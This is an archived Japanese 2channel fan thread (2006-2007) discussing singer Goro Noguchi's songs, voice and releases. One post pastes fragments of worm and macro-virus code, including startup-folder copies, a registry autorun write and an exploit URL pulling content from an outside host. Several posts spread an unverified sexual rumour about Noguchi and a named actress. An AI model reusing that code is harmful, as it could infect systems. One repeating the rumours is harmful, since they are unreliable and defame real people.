2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【19:00の街】野口五郎 統一スレッド【prat1】

1 :NO MUSIC NO NAME:2006/06/03(土) 00:59:45 ID:+WfpVVWU
女は息・・・男は汗・・・夜を重ねて・・・

2 :NO MUSIC NO NAME:2006/06/03(土) 01:04:32 ID:/F3dwIJT
ついに立ったか。>>1さん乙です

3 :NO MUSIC NO NAME:2006/06/03(土) 01:08:06 ID:+WfpVVWU
>>2
満を持して立てました。

4 :NO MUSIC NO NAME:2006/06/03(土) 01:13:54 ID:+WfpVVWU
19:00の街うpします

5 :NO MUSIC NO NAME:2006/06/03(土) 01:16:21 ID:+WfpVVWU
保守

6 :NO MUSIC NO NAME:2006/06/03(土) 01:17:29 ID:+WfpVVWU
6GET

7 : 7 7:2006/06/03(土) 01:18:01 ID:+WfpVVWU
 

8 : 8 8:2006/06/03(土) 01:18:45 ID:+WfpVVWU
 

9 : 9 9:2006/06/03(土) 01:19:36 ID:+WfpVVWU
銀河鉄道

10 :: 0 0 A M:2006/06/03(土) 01:20:23 ID:+WfpVVWU
 

11 :: 0 0 A M:2006/06/03(土) 01:21:01 ID:+WfpVVWU
 

12 :: 0 0 P M:2006/06/03(土) 01:21:31 ID:+WfpVVWU
 

13 :: 0 0 P M:2006/06/03(土) 01:22:24 ID:+WfpVVWU
 

14 :: 0 0 P M:2006/06/03(土) 01:32:14 ID:+WfpVVWU


15 :: 0 0 P M:2006/06/03(土) 01:33:13 ID:+WfpVVWU


16 :: 0 0 P M:2006/06/03(土) 01:33:57 ID:+WfpVVWU


17 :: 0 0 P M:2006/06/03(土) 01:34:44 ID:+WfpVVWU


18 :: 0 0 P M:2006/06/03(土) 01:35:34 ID:+WfpVVWU


19 :: 0 0 の 街:2006/06/03(土) 01:37:39 ID:+WfpVVWU
都会は海・・・人は砂漠・・・愛は蜃気楼

20 :: 0 0 P M:2006/06/10(土) 21:47:25 ID:Gj+lgQYh
 

21 :NO MUSIC NO NAME:2006/06/10(土) 21:57:38 ID:dRAuCZY2
野口五郎の中では「19:00の街」が最高にいいよな。

♪ 2本目の タバコに 火をつけ〜♪

22 :NO MUSIC NO NAME:2006/06/10(土) 21:58:24 ID:dRAuCZY2
五郎ちゃんって、今何してるの?

23 :: 0 0 P M:2006/06/11(日) 09:41:01 ID:tN9UvZyw


24 :NO MUSIC NO NAME:2006/06/13(火) 01:12:49 ID:LnG70I5R
大河ドラマに出たり、音楽配信の社長やったりしてる。
新御三家の中で、結局一番堅実だったね。

25 :NO MUSIC NO NAME:2006/06/14(水) 10:47:40 ID:o4ySXM84
http://www.hmv.co.jp/product/detail.asp?sku=1270873

26 :NO MUSIC NO NAME:2006/06/24(土) 22:17:54 ID:JbPIHrIZ
19:00の街って会社が終わった後のアフターのこと言ってるの?

27 :いちファン:2006/06/30(金) 13:55:31 ID:kHDItqx0
三十年来のファンです。はたち頃までの五郎さんは、天才的な上手さだった。今も高音は素晴らしいが、中低音が…(ノ_<。)

28 :NO MUSIC NO NAME:2006/07/10(月) 22:39:31 ID:mGq7X559


29 :NO MUSIC NO NAME:2006/07/10(月) 22:43:24 ID:Fp053wip
歌詞が独特で今までにないタイプなのがいい。

30 :NO MUSIC NO NAME:2006/07/11(火) 11:20:13 ID:KRA1fasp
もっと歌に力をそそいでほしい。

31 :NO MUSIC NO NAME:2006/07/11(火) 15:46:45 ID:l4FZKLJd
もっと昔のアルバムを復刻してほしい。

32 :NO MUSIC NO NAME:2006/07/12(水) 00:51:26 ID:mysnquyY
この前テレビで歌っていたが
声が全然でていない、低いキーで歌ってみるといい
この人センスが無い。歳に合わせてセンスをかえていかなくてはダメ
声がでねーんだから 

33 :NO MUSIC NO NAME:2006/07/12(水) 08:19:16 ID:FVqx0FhM
五郎の歌はどの曲も音域が広くて、サビは必ず高音を入れて作られている。


34 :NO MUSIC NO NAME:2006/07/12(水) 08:23:57 ID:FVqx0FhM
森山加代子がスゴイ音痴になっていた。
60歳くらいらしいけど、五郎も人前で歌い続けないとだめだよ。


35 :NO MUSIC NO NAME:2006/07/13(木) 00:04:27 ID:zq8tzanP
五郎の落ちぶれ振りは見事ですな。

36 :NO MUSIC NO NAME:2006/07/15(土) 00:46:29 ID:JZf/F8+d
むさし野詩人はいい曲だな。歌に風情がある。

37 :NO MUSIC NO NAME:2006/07/17(月) 00:51:18 ID:dVgxDhre
>>36
同感であります。


38 :NO MUSIC NO NAME:2006/07/17(月) 16:18:03 ID:psUA9m9j
オナ五郎

39 :NO MUSIC NO NAME:2006/07/17(月) 20:03:20 ID:g/ipTXBC
ピカ五郎

40 :NO MUSIC NO NAME:2006/07/17(月) 22:24:06 ID:BUFeWzyx
岐阜県人にとって野口五郎は誇りだった。今では熊田曜子が誇りだ。


41 :NO MUSIC NO NAME:2006/07/17(月) 23:44:02 ID:ufI3uWHU
http://vista.x0.to/img/vi5312117335.jpg
http://nhk.upkita.net/up/nhk564.jpg
http://nhk.upkita.net/up/nhk570.jpg
http://vista.x0.to/img/vi5312424581.jpg



42 :NO MUSIC NO NAME:2006/07/18(火) 00:05:00 ID:g/ipTXBC
髪はフサフサですね

43 :NO MUSIC NO NAME:2006/07/18(火) 09:16:32 ID:IF3k//PH
ハンサムですね。

44 :NO MUSIC NO NAME:2006/07/18(火) 14:30:01 ID:+J2mOTB/
「野口五郎」の名前が地味だったね。故郷の岐阜に「野口五郎岳」という山があって
そこからとったみたいだけど、ちょっとね・・

45 :NO MUSIC NO NAME:2006/07/18(火) 14:51:13 ID:479eO06X
夜の色溶かした街に横たわるバスターミナル♪
「異邦人」好きだったな。ファンはやめちゃったけど。
「少女よ」も同じアルバムだっけ?
この人頭の回転が速くて面白いよね。
昨日NHK見たら大相撲のゲストに出てて久々に思い出した。

46 :NO MUSIC NO NAME:2006/07/19(水) 23:24:51 ID:WCvrvGPf
 (;´Д`) シコシコシコシコ
_(ヽηノ_
  ヽヽ

47 :NO MUSIC NO NAME:2006/07/19(水) 23:26:43 ID:s3Iz+aLa
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
???

48 :NO MUSIC NO NAME:2006/07/20(木) 10:03:59 ID:VIuBF+ip
>>45
『異邦人』今も時々聴いてます♪
アレンジが当時流行っていたクロスオーバー風でなんともよい。

49 :NO MUSIC NO NAME:2006/07/21(金) 10:19:40 ID:wbSsK6/L
ご苦労さまです(`・ω・´)ゞ


50 :NO MUSIC NO NAME:2006/07/26(水) 22:23:22 ID:dnYr+O/3
「二人の朝食」いいな。

51 :ほんと:2006/08/03(木) 22:11:37 ID:9ur+B1ql
スターどっきりマル秘報告で、
ご*−の部屋に隠しカメラを仕込んでおいて、
おねえちゃんを送り込んだりして下心をヲッチしようとする企画
だったのに、部屋に入ってくるやいなや
パンツ脱いでオナニーし始めて
企画中止になった


52 :NO MUSIC NO NAME:2006/08/04(金) 03:26:52 ID:3ICbPIuG
昭和の歌謡曲の名曲19:00の街

53 :NO MUSIC NO NAME:2006/08/14(月) 23:41:28 ID:Jok0IUNr


54 :NO MUSIC NO NAME:2006/08/23(水) 18:14:47 ID:0dbbY6oL
時が止まった。

55 :NO MUSIC NO NAME:2006/09/03(日) 13:16:56 ID:BAOjN28F
紅白では「19:00の街」で最後だった。
去年は期待していたがムリだった。

56 :NO MUSIC NO NAME:2006/09/03(日) 13:24:24 ID:3wWFSu1Z
ああ時間だけが過ぎてゆくいたずらに

57 :NO MUSIC NO NAME:2006/09/03(日) 20:31:54 ID:YrigDuoY
この年になると、
なんと寂しい歌詞だろう。

58 :NO MUSIC NO NAME:2006/09/05(火) 14:16:37 ID:9xYJJZ1V
小堺と話しているのを見てゲンナリした。

最近若い子と音楽の仕事をしている

最初はださいと言われる

でも最後には若い子は僕の信者になる

語り方は違うけれどZEEBRAと痛さが同じです

59 :NO MUSIC NO NAME:2006/09/05(火) 15:32:03 ID:FxZZNqVw
なぜ韓国人男性は日本人女性にモテるのか  2006/09/05 08:40
http://japanese.chosun.com/site/data/img_dir/2006/09/05/200609050000111insert_1.jpg
「日本人女性の財布の中身はソウルにつぎ込まれている!」

米国のシカゴ・トリビューン紙がアジアの韓流ブーム現象を特集し、注目を浴びている。
同紙インターネット版は4日(韓国時間)、「日本の女性たちはソウルの男性とお付き合いする
ために血眼になっている」という見出しの記事を掲載した。これは韓流ブームについての記事だ。

 天井知らずの人気を誇る韓流スターたちの出演料も詳しく紹介している。
同紙は「韓国の人気男優たちはハリウッドを除けば最高の待遇で迎えられる俳優になった。
ドラマ『冬のソナタ』のペ・ヨンジュンは現在、映画1本当たり500万ドル(約5億8300万円)の
ギャラが設定されている。また、彼は各種事業を展開し、その資産は1億ドル(約116億円)近い。
その他、チャン・ドンゴンやリュ・シウォンなどの韓流スター9人も年間1000万ドル
(約11億6000万円)以上を稼ぎ出している」と報じた。そして「こうした韓流ブームのおかげで、
韓国の観光産業は右肩上がりで、韓流スター関連グッズも飛ぶように売れている」と付け
加えた。特に、この現象は日本だけでなく中国や、ベトナムなど東南アジアにも広がっている、
と分析している。

 また、「韓国の男性は“アジアのイタリア人”と呼ばれている」とも報じている。
「健康な体と2年間の徴兵義務で、韓国の若い男性はアジアで最も心身共に
よく鍛えられていると言われ、こうしたあだ名がついた」という。

 同紙は、「そのため韓国の男性は日本で一番憧れの男性像になった」と強調する。
お見合いのためにこれまでに韓国を10回も訪れたという日本人女性ヨシムラさんとの
インタビューも掲載された。彼女は「韓国の男性は甘くてロマンチック。
“愛している”の一言も口にできない日本人男性とは違う」として、
理想の韓国人男性探しを続けるという夢を語ったという。

 ついに韓流ブームは、全世界が注目する文化現象として定着したようだ。

キム・ソンウォン記者 『スポーツ朝鮮』
http://japanese.chosun.com/site/data/html_dir/2006/09/05/20060905000011.html

60 :NO MUSIC NO NAME:2006/09/05(火) 17:08:18 ID:h7Fmrpki
>>58
ZEEBRAとは何?
五郎は結局、何を言いたかったのか?
若者をバカにしているのか、一緒に音楽をやるのが楽しいのかわからないね。
プライドが高いのかな。




61 :NO MUSIC NO NAME:2006/09/11(月) 09:45:38 ID:ewsT4bv7
今日と明日は、STBライブだね。成功を祈る!

62 :NO MUSIC NO NAME:2006/09/11(月) 18:53:42 ID:y7QEyE8b
うらやまし!歌うまいね。

63 :NO MUSIC NO NAME:2006/09/17(日) 04:04:17 ID:uSYVYBKI
ケイゾクで演じた早乙女はいい感じでしたよね

64 :NO MUSIC NO NAME:2006/09/17(日) 22:08:40 ID:0r3MAVpe
ライブで歌われた「変わらぬ想い」の英語の歌詞の
解らない部分があるので教えてください。


65 :NO MUSIC NO NAME:2006/09/19(火) 09:19:31 ID:2wGTlpg1
iTuneでひさびさにNY録音アルバムのベースボールの歌(題名忘れた)を
きいたけど、アレンジが今聴いてもすごい。三十年近くたっていると思うけど

このアルバムきくとNYの街が浮かぶ
五番街のマリーとこのアルバムがわたしのNYへの夢をかきたてました。


66 :NO MUSIC NO NAME:2006/09/19(火) 22:28:53 ID:oAslXNv6
>>65
NY録音盤「異邦人」の中の「二死満塁の青春」ですね。
このアルバムはいい出来ですよね。(今は持っていないけど)
その曲だけはは「筒美京平ウルトラ・ベスト・トラックス」で聴けるのです。
私もかなり好き。

67 :まじかよー:2006/09/21(木) 04:08:23 ID:Z2lmr1KL
…マジ、野口五郎はスタードッキリの収録中 ホテルでひとり*をしてしまい 収録パーにしたと北野誠が会場で言ってたけど三井ゆりは知ってて 結婚したのかな?おい、背中のニキビっつーの?いや違うな、あれは なんつーのかな、なんか…


68 :NO MUSIC NO NAME:2006/09/21(木) 09:01:04 ID:HZCctAR1
プロデューサーとしての仕事でかなり忙しそうだ。
それは表に出てこないので、ファンにはわかりにくいけれど、
手掛けたミュージシャンなどからポロポロ情報が出てくる。
歌手,タレント野口五郎としての活動と同時進行でやってるからそのエネルギーはすごい。
健康には気をつけてもらいたい。

69 :NO MUSIC NO NAME:2006/09/25(月) 22:52:19 ID:JtKO0kii
次は何するの?

70 :NO MUSIC NO NAME:2006/09/29(金) 14:47:22 ID:IfiQi1OJ
今何をしている?

71 :NO MUSIC NO NAME:2006/10/03(火) 09:34:26 ID:RkeNgnL4
携帯のコマーシャルに、五郎の名前だけ出ているっていう話きいたけど〜

72 :五郎のオナニー話 :2006/10/04(水) 02:14:37 ID:c/5RGE+e
 五郎のオナニー話は北野誠の
どっきりのライブで真実が、じっくりと流れてるよ、
何ホローしても 無駄無駄、

また世間に広まったねー、五郎の子供もかわいそうに!、
オナニー親父!
これで いじめられるなー どのみち もうテレビも
出てないくらいに 野口五郎自体が
廃れてるし マジに終わったな!、、、、、野口、、哀れ・・・

73 :NO MUSIC NO NAME:2006/10/16(月) 00:03:16 ID:epgvU283
1 名無しさんにズームイン! sage New! 2006/10/15(日) 23:49:47.28 ID:CpSlfWtz
「五郎出現(秘)カラオケ」


2 名無しさんにズームイン! sage New! 2006/10/15(日) 23:51:50.77 ID:8YYF7cFE

ttp://guri.kill.jp/up3/photo/up043.jpg
ttp://guri.kill.jp/up3/photo/up044.jpg
ttp://guri.kill.jp/up3/photo/up045.jpg


3 名無しさんにズームイン! New! 2006/10/15(日) 23:52:37.69 ID:ckrR6kDk
またゴロー…
>>3はゴロー本人


4 名無しさんにズームイン! sage New! 2006/10/15(日) 23:53:22.21 ID:/Q+Gn6W8
今帰ってきた
今日のガキは諦めてたのにラッキーww



5 名無しさんにズームイン! New! 2006/10/15(日) 23:53:26.85 ID:e2nfwL1m
>>2
(= ´ω`)ゃぁ


6 名無しさんにズームイン! New! 2006/10/15(日) 23:53:52.62 ID:P7NbvWQm
野口五郎


74 :NO MUSIC NO NAME:2006/10/16(月) 00:04:28 ID:+AHHvsg6
ガキの使いなんででてくるの?

75 :NO MUSIC NO NAME:2006/10/28(土) 19:05:23 ID:0vAypyu4
久々に歌ってる姿をガキ使で見たが、私鉄沿線、いい歌だなぁ…

下手くそな浜田はよく歌ってるようだが、ド下手な奴ほどこういう難しい歌唄いたがるんだよなぁ 五郎が汚れるから唄うなっつーの

76 :NO MUSIC NO NAME:2006/11/06(月) 08:47:39 ID:vSlCrbpP
ヒット曲よりライブで歌っている曲をテレビで聴きたい。
ライブのように客がいるところで歌ってほしい。

77 ::2006/11/26(日) 12:20:06 ID:MeN5ivsd


78 ::2006/11/26(日) 12:22:30 ID:MeN5ivsd
…マジ、野口五郎はスタードッキリの収録中 ホテルでひとり*をしてしまい 収録パーにしたと北野誠が会場で言ってたけど三井ゆりは知ってて 結婚したのかな?おい、

79 :NO MUSIC NO NAME:2006/12/01(金) 00:57:03 ID:wYAHkzYM
「ガキの使い」で私鉄沿線を初めて聞いた22歳です.
最近では2005年にも私鉄沿線が収録されているアルバムが発売されていますが,
これは昔の音源(非常に若い声)なのでしょうか?録音し直したものなのでしょうか?

80 :NO MUSIC NO NAME:2006/12/02(土) 21:45:23 ID:sSuh7EBs
そんな事どうでもいいじゃない〜

81 :NO MUSIC NO NAME:2006/12/02(土) 21:48:22 ID:sSuh7EBs
>>79
その2005年のアルバムってのが何なのか分からないけど
「私鉄沿線2002」以外は昔のオリジナル音源だと思いますよ

82 :NO MUSIC NO NAME:2006/12/03(日) 09:18:08 ID:jhfWEMua
ファンはヒット曲ならたいてい昔の音源は持ってるから
新しく出ても買わないのでしょ?
昔のアルバムでCD化されたら買うけど。


83 :NO MUSIC NO NAME:2006/12/03(日) 18:12:05 ID:HXMy64za
>>82
そーだ そーだ
全く同感だよ

84 ::2006/12/06(水) 05:57:41 ID:ghHFDpWl


85 :NO MUSIC NO NAME:2006/12/06(水) 18:32:45 ID:9rwX6REM
野口五郎がやってる音楽配信『音コレ』改め『Gプロデュース』
モノマネ配信の他にインディーズのプロデュースもしてるらしい。
話題にもならんけどみんな知ってる?

86 :NO MUSIC NO NAME:2006/12/06(水) 20:29:28 ID:JvCiXwZp
夜の色溶かした街に〜

87 :NO MUSIC NO NAME:2006/12/06(水) 23:15:44 ID:thtf6VM0
>>85
あたりまえ、Gプロデュースなら誰でも知っている。
あのサイトの対談とかコレ夫くんのブログいいと思う。



88 :NO MUSIC NO NAME:2006/12/06(水) 23:19:08 ID:thtf6VM0
もちろんファンならね

89 :NO MUSIC NO NAME:2006/12/06(水) 23:22:03 ID:thtf6VM0
インディーズなんてテレビでメジャーなミュージシャンより
かっこいいのたくさんいるのにね。

90 :NO MUSIC NO NAME:2006/12/10(日) 15:42:51 ID:dJDvDtOe
昔大ファソだったよ。
ソフトで湿り気のあるのびやかなあの声が大好きだったんだよ。
だが今は…
35周年DVDを買ってみたのだが…
なぜあんなに下手になったのだろう? (密林レビューの現役ファソ必死だな。)
声の出し方がツラい。搾り過ぎだろ。喉の筋肉が緊張しすぎるのか?
そういう時の身体のアクションもやはり連動して筋肉が引きつってる。(まんまコロッケ)
だが数曲聴けるものがあった。そういう時は喉も身体もリラックスしているようだ。
もしかして筋肉or神経の病気なのだろうか…と、マジ心配してみる。
(それか八代亜紀のように声帯傷めて声出なくなったか?)

昔のモノはどれも今聞いても良いよ。

91 :NO MUSIC NO NAME:2006/12/10(日) 20:34:01 ID:3ZFLfYiM
30歳代の五郎はあまり好きではなかった。
ずっと見つめていたら彼の魅力を再確認できた。
止まらない五郎に拍手!

92 :NO MUSIC NO NAME:2006/12/11(月) 17:48:42 ID:XQOi4EvV
五郎ちゃんかわいいよ

93 :NO MUSIC NO NAME:2006/12/12(火) 10:57:47 ID:gtJWFaLR
こないだ『再会』DVD買って見た。
暗い… 最初から最後まで暗い… BGMがめっちゃ落ち込む…
高度成長期の横浜が舞台でこの暗さ…ありえん。
昔見た時は子供だったのでストーリー追わずにゴローの顔ばかり見ていた
のでよく覚えていなかったのだが。
それにしてもゴローは本当に美青年だったんだね〜。
演技も良かったよ。ナイーブが表情がたまらん。
…だが今はうちのダンナの方が垢抜けてカコヨく見えるよ。ゴローより年上だが。
もちっとやせてスタイリスト付けてヘアスタイル変えたらいいのかな?
ゴローは長髪の方が似合うよ。

94 :NO MUSIC NO NAME:2006/12/12(火) 15:31:14 ID:6gJWGnh7
『季節風』のほうが演技も表情もいい。
やはり成長していると思った。
若い頃、髪が短くなったときは似合わないと思った。
年をとって長髪が似合うかは疑問。
スタイリストはつけて欲しいな。


95 :NO MUSIC NO NAME:2006/12/12(火) 18:56:35 ID:JLtssSLp
>94
そうですか。『季節風』も買ったので近々見ます。
長髪…と言っても若い頃みたいな長〜いのじゃなくてさ。
きっとゴローに似合うスタイルがあると思うんだよね〜
なんか今のはカッチリしすぎな気がス。ヒロシお兄さんみたい。
           


96 :NO MUSIC NO NAME:2006/12/12(火) 20:48:32 ID:6gJWGnh7
>>95
確かに今よりもっとぺっちゃりした髪のときがあったけど、変だった。
ふんわりして多少長いほうがいいかもね。
言ってあげてちょうだい。
長髪は結婚式の写真が最後かな?

97 :NO MUSIC NO NAME:2006/12/12(火) 22:24:18 ID:bs8LSWIj
>>90
全く同意見です。
35周年DVDは繰り返し見る気がしない。
1974 GORO IN SUNPLAZA は何度聴いてもよい!
十代の頃に熱唱しすぎたツケだと思う。

98 :NO MUSIC NO NAME:2006/12/12(火) 23:15:01 ID:6gJWGnh7
いろいろな面で楽しめる人じゃないかな?
何しろこだわりの人だから。
すごいなと思うところもあり。
ネガってはいけない。
彼は十分頑張っている。


99 :NO MUSIC NO NAME:2006/12/14(木) 16:22:51 ID:UgXktU8b
>98
ずっと応援し続けてる寛容なファンなら「頑張ってるね」で済むかもしれないけど、
昔の五郎を知らない人が彼の最近の歌だけを聞いて「野口五郎って歌ヘタ!」と判断される・・
そんなのイクナイ!
>97
禿げ上がるほど同意。
あのDVDは歌だけでなく、構成もMC(がほとんど皆無なの)も会場の雰囲気も客のノリも
すべてひどい。
弾き語りも良くないのかな〜? 歌う時は歌だけ、ギター弾く時はギターだけ、
という方がいいのかな? 
ビッグバンドじゃないから仕方ないけど、あのオシャレっぽく?したつもりの
アレンジも失敗だった気が。
声が滑らかでなくなっちゃったのは舞台の影響もあるのかな〜?
昔の明治チョコレートのCM、あれはたった十数秒でも画面に引き込まれたもんだ。

カックラキンDVD発売熱望。


100 :NO MUSIC NO NAME:2006/12/14(木) 16:34:43 ID:UgXktU8b
↑付け足し。
あと、作り笑いもイタかったよ。なんであんな笑い方するようになったの?>dvd


101 :NO MUSIC NO NAME:2006/12/17(日) 11:45:03 ID:VfiEuE4r
nothing's gonna change my love for you

102 :NO MUSIC NO NAME:2006/12/20(水) 18:11:36 ID:sjUWMre+
例えば「私鉄沿線」

「僕の街で〜♪」から後の張って歌うところは今でもよいと思う。
(^O^)
でも前半部分がなぜあんなに情けないの?
(>_<)
歳をとって高音が衰えるというならわかるのだけど…


103 :NO MUSIC NO NAME:2006/12/20(水) 21:26:02 ID:TN3uVvdM

この人更年期?

104 :NO MUSIC NO NAME:2006/12/20(水) 21:40:40 ID:sjUWMre+
荒れるのは本意じゃないから
100より前の人とは別人です
とだけ書いておきます。


105 :NO MUSIC NO NAME:2006/12/21(木) 02:19:36 ID:P8CnKV+m
テス

106 :じんべえ:2006/12/21(木) 21:19:19 ID:RqjzdVdT

おぃおぃ
GOROファソのほとんどが更年期かあがりのはずですYO
モバファソ同士なかよくやることをおススメしますYO、漏れ
ところで別スレで書き立てられている
「どっきり収録中」の件は本当ですか?
本当ならショックですよ、漏れ

┐('〜`;)┌

107 :NO MUSIC NO NAME:2006/12/22(金) 11:29:03 ID:5UKlOF5Q
大晦日のガキ使に出るかも?

108 :NO MUSIC NO NAME:2006/12/22(金) 11:30:37 ID:ibW5zrw6
>>106
あれは上でもチラッとあるけど北野誠がある事無い事しゃべりまっくった…
…んじゃないですかね?
ホラ、原田○世さんのスカ○ロ趣味ネタと同じでさ。

私は五郎ファンの中では若い方?かも…。(まだ30代)
でもさ、芸能人ってファンのいろんなありがたい意見があってこそ、
いつまでも現役で輝いていれるんじゃないかな?
ホムペの伝言板とか見てるとナンカほめ殺しですか〜?と言いたくなるよ。
ま、表舞台は退いてこれから裏方オンリーで活躍っていうのならいいかもしれないが。
声は…もうダメなのかな? 五郎だってもちろん解ってると思うよ。
本人がいちばん辛いのだろう。 


109 :じんべえ:2006/12/22(金) 20:09:47 ID:jUPjnRFI
エエエェェェエエ
知世タソにスカトロ疑惑があったなんて
((((;゚д゚))))

これも前のレスでGOROファソの方に失礼があったことへの報いだと
真摯に受け止めております

両方ともデマであることを信じてやまないですYO、漏れ


110 :NO MUSIC NO NAME:2006/12/22(金) 23:27:37 ID:KZpe9DOh
じんべえよもちつけ!
だから限り無くデマだってば!  
でもファンなのに今まで知らなかったなんて。検索するといっぱい出てくるジャマイカ。

111 :NO MUSIC NO NAME:2006/12/23(土) 14:18:56 ID:/nZzXOQa
先日ベスト盤買いました。
19曲収録のうち知ってるのは
「私鉄沿線」「19:00の街」だけでしたが
他にもイイ曲あるのを知りました。
今30歳なのでリアルに体験してないんですが
アイドル当時、他の人達とは一線を画してたんでしょうね。

112 :NO MUSIC NO NAME:2006/12/23(土) 15:42:35 ID:jBEYtJ1A
 野口五郎ってギター狂じゃない?仲のいい野村嘉男と二人で布袋とCHARの向うを張ってバトル・ライヴとかやったら面白いんじゃないかね。

113 :NO MUSIC NO NAME:2006/12/28(木) 20:42:33 ID:nYQeYebf
>111 さん、
1974年のLPレコード 「GORO IN SUNPLAZA 甘い生活」を
聴いてほしい!
中古で手に入るよ。
わずか18才の五郎の凄い歌唱力、表現力、感性
すばらしい!
ベスト版より良いよ!!

114 :NO MUSIC NO NAME:2006/12/28(木) 21:54:04 ID:hjsNXYWV
アルバムとシングルB面をCD再発して欲しい

115 :NO MUSIC NO NAME:2006/12/28(木) 23:12:29 ID:8qNcBeAI
『青春の一冊』って曲が、また聞きたくてCD探してたら、この曲が入ってるアルバムってみんな廃版になっててんだね。残念。

116 :NO MUSIC NO NAME:2006/12/29(金) 01:26:53 ID:qu1tA8TT
>113
「愛の肖像」とか入ってるやつ?
当時はすっごく聞き惚れたけどな〜。
純粋だったあの時代であの年齢でこそ涙も出たって感じかな。
今じゃだめ。入り込めない。冷めちゃう。
「北回帰線」とか「異邦人」の方が今でも聴ける。というか今聴いても新鮮。
人それぞれだね。 
>115
「青春の一冊」良いよね! 好きだ!


117 :NO MUSIC NO NAME:2006/12/29(金) 11:44:57 ID:e/+iDjla
懐古には
ついていけない・・・

118 :NO MUSIC NO NAME:2007/01/01(月) 00:10:12 ID:fkbwtAWh
期待してるよ!

119 :NO MUSIC NO NAME:2007/01/01(月) 18:08:39 ID:mOTzZEzo
B面コレクションU出してほしい
・ぬれた瞳
・友よ、君のために
・帰郷
・卑弥呼
・ジャズ
収録希望

ついでに
君に届かない歌(Everybody Loves Me)もお願い


120 :NO MUSIC NO NAME:2007/01/01(月) 20:12:48 ID:fkbwtAWh
>>119
聴いたことがないのばかりです。

121 :NO MUSIC NO NAME:2007/01/01(月) 21:46:13 ID:ES8vNOg9
公式にあんなしっかりとしたディスコグラフィー載せてる人だから
企画が出れば再発とかCD化はすぐに実現しそうなんだけどな

122 :NO MUSIC NO NAME:2007/01/05(金) 23:03:10 ID:Ns1c1RQz
>>113
『アドロ』いい!

123 :NO MUSIC NO NAME:2007/01/06(土) 15:38:47 ID:STw/XfT6
>>119
自分もあんまりなじみないなあ。
B面じゃないと思ったけど『枯葉のいつわり』ってどっかに入ってる?
あれ好きだったんだよね。

124 :NO MUSIC NO NAME:2007/01/06(土) 22:04:07 ID:/PVDU5zj
>>123
『枯葉のいつわり』は
アルバム  GORO LOVE in LONDON/愛ふたたび に入っている。 
他のにも入っているのかな?

125 :NO MUSIC NO NAME:2007/01/06(土) 22:15:25 ID:XfUGQA79
>>124
ありが?
でも密林見たけどCD化はされてないんだね…プレーヤー無いよ…orz
LOVE IN EONDONでも「雨のガラス窓」はCD化されてるのに。
どっちにしろ在庫無しなわけだが。

126 :NO MUSIC NO NAME:2007/01/08(月) 13:00:41 ID:szSf70NK
オフィシャルの今月の歌が「PARADE」の中の曲。
このアルバム持っていたのにぜんぜん覚えていない。
ライブで歌った「夢がさめればブルース」もこの中の曲なのね。

127 :甚べえ:2007/01/08(月) 22:00:02 ID:vKTV2H8C
(=゚ω゚)ノぃょぅ

もひさしぶりです
先日 叔母に野口五郎の演歌のアルバムを借りたのですが
氷川きよしより全然うまいと思いますたYO
正直ビクーリしますたYO、漏れ…

128 :NO MUSIC NO NAME:2007/01/09(火) 08:57:44 ID:MTVit7HL
野口五郎演歌の世界
「風に舞う花びら」
19歳のときですか。
A面がオリジナル、B面が先輩のものをカバーしています。
哀愁の込め方は五郎さん上手だから心に沁みます。
このアルバムも好きで擦り切れるほど聴いてうっとりしました。
兄弟アルバム「通り過ぎたものたち」も哀愁演歌ぽい曲が多くて好きだった。
かな?

129 :NO MUSIC NO NAME:2007/01/09(火) 09:04:42 ID:MTVit7HL
レコード聴けないから忘れてたけど、
兄弟アルバムなら「ときにはラリー・カールトンのように」
のほうがもっと好きだった。
オフィシャルのディスコグラフィー見て思い出した。

130 :NO MUSIC NO NAME:2007/01/09(火) 17:12:32 ID:daBp2J82
クリスマズディナーショーの数がめっきり減ってしまった…
プロデュース業務のほうが忙しくセーブしているのだろうか?

131 :NO MUSIC NO NAME:2007/01/09(火) 18:01:30 ID:MTVit7HL
年末はかなり忙しそうだったから仕方ないですね。
でも待っていた人もいたから、
ないなら早めに情報いれてほしいですね。
分からないまま間際までどうしようと迷っていた人いますよ。

132 :NO MUSIC NO NAME:2007/01/10(水) 16:29:50 ID:B4Uc4EL4
歌はフィーリングだって。
歌唱力とはどんなものかわからない。
演歌はキライ。
テンポの速いノリノリの歌がいい。
こんな若者が多い。

133 :NO MUSIC NO NAME:2007/01/11(木) 09:06:26 ID:NkoHqn3m
新曲聞きたいな。

134 :NO MUSIC NO NAME:2007/01/13(土) 11:25:50 ID:LyUJVmxT
いろいろやるのはいいけど、自分の歌も歌ってください。

135 :NO MUSIC NO NAME:2007/01/14(日) 13:03:34 ID:Kj43V/04
GORO-NETのdiscography を見たら
アルバムの中にGORO作曲のものがかなりあるのですね。
聴きたいな。
最近は作曲はしてないのかな。
